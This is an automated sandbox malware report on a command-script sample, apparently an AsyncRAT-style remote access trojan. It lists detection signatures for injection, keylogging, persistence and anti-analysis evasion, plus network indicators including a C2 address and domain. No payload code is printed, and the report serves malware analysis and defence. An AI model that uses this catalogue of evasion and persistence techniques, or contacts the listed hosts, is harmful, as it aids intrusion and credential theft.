Windows Analysis Report
payload.cmd

Overview

General Information

Sample name: payload.cmd
Analysis ID: 1524983
MD5: 19fc666f7494d78a55d6b50a0252c214
SHA1: 8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256: e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Tags: azure-winsecure-comcmduser-JAMESWT_MHT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.1% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 38_2_00401000
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEED894 FindFirstFileExW, 20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1D894 FindFirstFileExW, 20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1D894 FindFirstFileExW, 21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 21_2_00000286D7D1DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783D894 FindFirstFileExW, 40_2_000001D54783D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922D894 FindFirstFileExW, 41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942D894 FindFirstFileExW, 41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1ED894 FindFirstFileExW, 42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21D894 FindFirstFileExW, 42_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5D894 FindFirstFileExW, 43_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92D894 FindFirstFileExW, 44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95D894 FindFirstFileExW, 44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDD894 FindFirstFileExW, 45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0D894 FindFirstFileExW, 45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1D894 FindFirstFileExW, 46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DD894 FindFirstFileExW, 47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570D894 FindFirstFileExW, 47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_000001EF0570DA18

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.7:49719
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49719 -> 154.216.20.132:6969
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox View IP Address: 195.201.57.90 195.201.57.90
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipwho.is
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: azure-winsecure.com
Source: global traffic DNS traffic detected: DNS query: ipwho.is
Source: Microsoft-Windows-LiveId%4Operational.evtx.53.dr String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002B.00000002.2594057411.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079470975.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000002B.00000000.2079135025.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2586980188.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.micom/fwlink/?LinkI
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 0000002D.00000002.2645406461.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002D.00000000.2095647683.00000262ED790000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://osoft.co_2010-06X
